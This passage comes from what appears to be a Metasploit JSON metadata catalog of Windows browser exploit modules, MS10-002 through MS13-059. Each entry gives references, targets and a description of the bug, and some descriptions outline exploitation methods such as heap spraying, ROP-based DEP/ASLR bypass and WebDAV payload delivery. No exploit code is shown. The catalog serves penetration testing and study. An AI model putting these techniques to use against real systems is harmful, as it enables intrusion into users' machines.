"description": "This module exploits a vulnerability found in Internet Explorer's\n mshtml component. Due to the way IE handles objects in memory, it is\n possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext\n to be used even after it gets freed, therefore allowing remote code\n execution under the context of the user.\n\n This particular vulnerability was also one of 2012's Pwn2Own\n challenges, and was later explained by Peter Vreugdenhil with exploitation\n details. Instead of Peter's method, this module uses heap spraying like\n the 99% to store a specially crafted memory layout before re-using the\n freed memory.",
"references": [
"MSB-MS10-002",
"CVE-2010-0248",
"OSVDB-61914",
"URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup",
"ZDI-10-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7 SP0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_002_ie_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_002_ie_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_018_ie_behaviors": {
"name": "MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free",
"full_name": "exploit/windows/browser/ms10_018_ie_behaviors",
"rank": 400,
"disclosure_date": "2010-03-09",
"type": "exploit",
"author": [
"unknown",
"Trancer <mtrancer@gmail.com>",
"Nanika",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability within the DHTML behaviors\n functionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n discovered being used in-the-wild and was previously known as the \"iepeers\"\n vulnerability. The name comes from Microsoft's suggested workaround to block\n access to the iepeers.dll file.\n\n According to Nico Waisman, \"The bug itself is when trying to persist an object\n using the setAttribute, which end up calling VariantChangeTypeEx with both the\n source and the destination being the same variant. So if you send as a variant\n an IDISPATCH the algorithm will try to do a VariantClear of the destination before\n using it. This will end up on a call to PlainRelease which deref the reference\n and clean the object.\"\n\n NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.",
"references": [
"CVE-2010-0806",
"OSVDB-62810",
"BID-38615",
"URL-http://www.microsoft.com/technet/security/advisory/981374.mspx",
"URL-http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/",
"URL-http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html",
"MSB-MS10-018"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista",
"IE 6 SP0-SP2 (onclick)",
"IE 7.0 (marquee)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_018_ie_behaviors",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_018_ie_tabular_activex": {
"name": "MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption",
"full_name": "exploit/windows/browser/ms10_018_ie_tabular_activex",
"rank": 400,
"disclosure_date": "2010-03-09",
"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. By targeting control flow data\n on the stack, an attacker can execute arbitrary code.",
"references": [
"CVE-2010-0805",
"OSVDB-63329",
"BID-39025",
"ZDI-10-034",
"MSB-MS10-018"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_018_ie_tabular_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": {
"name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution",
"full_name": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32",
"rank": 500,
"disclosure_date": "2010-02-26",
"type": "exploit",
"author": [
"Maurycy Prodeus",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on a MessageBox originating from VBScript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n an HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve the HLP file as well as a payload EXE. During testing, warnings about the\n payload EXE being unsigned were witnessed. A future version of this module\n might use other methods that do not create such a warning.",
"references": [
"CVE-2010-0483",
"OSVDB-62632",
"MSB-MS10-023",
"URL-http://www.microsoft.com/technet/security/advisory/981169.mspx",
"URL-http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx",
"URL-http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer on Windows"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_026_avi_nsamplespersec": {
"name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",
"full_name": "exploit/windows/browser/ms10_026_avi_nsamplespersec",
"rank": 300,
"disclosure_date": "2010-04-13",
"type": "exploit",
"author": [
"Yamata Li",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Jordi Sanchez <jsanchez@0x01000000.org>"
],
"description": "This module exploits a buffer overflow in l3codecx.ax while processing\n AVI files with MPEG Layer-3 audio content. The overflow only allows overwriting\n with 0's, so the three least significant bytes of EIP saved on the stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note that on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.",
"references": [
"CVE-2010-0480",
"OSVDB-63749",
"BID-39303",
"MSB-MS10-026",
"URL-https://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/",
"URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 Automatic"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_026_avi_nsamplespersec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": {
"name": "Microsoft Help Center XSS and Command Execution",
"full_name": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec",
"rank": 600,
"disclosure_date": "2010-06-09",
"type": "exploit",
"author": [
"Tavis Ormandy",
"natron <natron@metasploit.com>"
],
"description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.",
"references": [
"CVE-2010-1885",
"OSVDB-65264",
"URL-http://www.microsoft.com/technet/security/advisory/2219475.mspx",
"MSB-MS10-042"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_046_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"B_H"
],
"description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.",
"references": [
"CVE-2010-2568",
"OSVDB-66387",
"MSB-MS10-046",
"URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_090_ie_css_clip": {
"name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption",
"full_name": "exploit/windows/browser/ms10_090_ie_css_clip",
"rank": 400,
"disclosure_date": "2010-11-03",
"type": "exploit",
"author": [
"unknown",
"Yuange",
"Matteo Memelli",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.",
"references": [
"CVE-2010-3962",
"OSVDB-68987",
"BID-44536",
"URL-http://www.microsoft.com/technet/security/advisory/2458511.mspx",
"EDB-15421",
"MSB-MS10-090"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Debug",
"Internet Explorer 6",
"Internet Explorer 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_090_ie_css_clip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_003_ie_css_import": {
"name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free",
"full_name": "exploit/windows/browser/ms11_003_ie_css_import",
"rank": 400,
"disclosure_date": "2010-11-29",
"type": "exploit",
"author": [
"passerby",
"d0c_s4vage",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.",
"references": [
"CVE-2010-3971",
"OSVDB-69796",
"BID-45246",
"URL-http://www.microsoft.com/technet/security/advisory/2488013.mspx",
"URL-http://www.wooyun.org/bugs/wooyun-2010-0885",
"URL-https://seclists.org/fulldisclosure/2010/Dec/110",
"MSB-MS11-003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 8",
"Internet Explorer 7",
"Internet Explorer 6",
"Debug Target (Crash)"
],
"mod_time": "2018-10-02 15:57:57 +0000",
"path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_003_ie_css_import",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_050_mshtml_cobjectelement": {
"name": "MS11-050 IE mshtml!CObjectElement Use After Free",
"full_name": "exploit/windows/browser/ms11_050_mshtml_cobjectelement",
"rank": 300,
"disclosure_date": "2011-06-16",
"type": "exploit",
"author": [
"d0c_s4vage",
"sinn3r <sinn3r@metasploit.com>",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid <object> tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed <object> and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).",
"references": [
"CVE-2011-1260",
"OSVDB-72950",
"MSB-MS11-050",
"URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 7 on XP SP3",
"Internet Explorer 7 on Windows Vista",
"Internet Explorer 8 on XP SP3",
"Internet Explorer 8 on Windows 7",
"Debug Target (Crash)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_050_mshtml_cobjectelement",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_081_option": {
"name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free",
"full_name": "exploit/windows/browser/ms11_081_option",
"rank": 300,
"disclosure_date": "2012-10-11",
"type": "exploit",
"author": [
"Ivan Fratric",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Microsoft Internet Explorer. A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.",
"references": [
"CVE-2011-1996",
"OSVDB-76208",
"MSB-MS11-081",
"URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html",
"URL-http://pastebin.com/YLH725Aj"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_081_option.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_081_option",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_093_ole32": {
"name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution",
"full_name": "exploit/windows/browser/ms11_093_ole32",
"rank": 300,
"disclosure_date": "2011-12-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.",
"references": [
"MSB-MS11-093",
"CVE-2011-3400",
"OSVDB-77663",
"BID-50977",
"URL-http://aluigi.org/adv/ole32_1-adv.txt",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3 / Visio Viewer 2010",
"IE 7 on Windows XP SP3 / Visio Viewer 2010"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_093_ole32.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_093_ole32",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_004_midi": {
"name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow",
"full_name": "exploit/windows/browser/ms12_004_midi",
"rank": 300,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"Shane Garrett",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.",
"references": [
"MSB-MS12-004",
"CVE-2012-0003",
"OSVDB-78210",
"BID-51292"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_004_midi.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_004_midi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_037_ie_colspan": {
"name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",
"full_name": "exploit/windows/browser/ms12_037_ie_colspan",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Alexandre Pelletier",
"mr_me <steventhomasseeley@gmail.com>",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.",
"references": [
"CVE-2012-1876",
"OSVDB-82866",
"BID-53848",
"MSB-MS12-037"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_037_ie_colspan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_037_same_id": {
"name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",
"full_name": "exploit/windows/browser/ms12_037_same_id",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Dark Son",
"Unknown",
"Yichong Lin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).",
"references": [
"MSB-MS12-037",
"CVE-2012-1875",
"OSVDB-82865",
"URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
"URL-https://twitter.com/binjo/status/212795802974830592",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows XP SP3 with JRE ROP",
"IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_037_same_id",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": {
"name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
"full_name": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
"rank": 200,
"disclosure_date": "2013-02-13",
"type": "exploit",
"author": [
"Scott Bell <scott.bell@security-assessment.com>"
],
"description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. This memory is reused when a CDoc relayout is performed.",
"references": [
"CVE-2013-0025",
"OSVDB-90122",
"MSB-MS13-009",
"URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_022_silverlight_script_object": {
"name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
"full_name": "exploit/windows/browser/ms13_022_silverlight_script_object",
"rank": 300,
"disclosure_date": "2013-03-12",
"type": "exploit",
"author": [
"James Forshaw",
"Vitaliy Toropov",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.",
"references": [
"CVE-2013-0074",
"CVE-2013-3896",
"OSVDB-91147",
"OSVDB-98223",
"BID-58327",
"BID-62793",
"MSB-MS13-022",
"MSB-MS13-087",
"PACKETSTORM-123731"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86/x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_022_silverlight_script_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_037_svg_dashstyle": {
"name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
"full_name": "exploit/windows/browser/ms13_037_svg_dashstyle",
"rank": 300,
"disclosure_date": "2013-03-06",
"type": "exploit",
"author": [
"Nicolas Joly",
"4B5F5F4B",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.",
"references": [
"CVE-2013-2551",
"OSVDB-91197",
"BID-58570",
"MSB-MS13-037",
"URL-http://binvul.com/viewthread.php?tid=311"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_037_svg_dashstyle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_055_canchor": {
"name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
"full_name": "exploit/windows/browser/ms13_055_canchor",
"rank": 300,
"disclosure_date": "2013-07-09",
"type": "exploit",
"author": [
"Jose Antonio Vazquez Gonzalez",
"Orange Tsai",
"Peter Vreugdenhil",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.",
"references": [
"CVE-2013-3163",
"OSVDB-94981",
"MSB-MS13-055",
"URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_055_canchor.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_055_canchor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_059_cflatmarkuppointer": {
"name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
"full_name": "exploit/windows/browser/ms13_059_cflatmarkuppointer",
"rank": 300,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"corelanc0d3r",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.",
"references": [
"CVE-2013-3184",
"OSVDB-96182",
"MSB-MS13-059",
"BID-61668",
"ZDI-13-194",
"ZDI-13-195"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
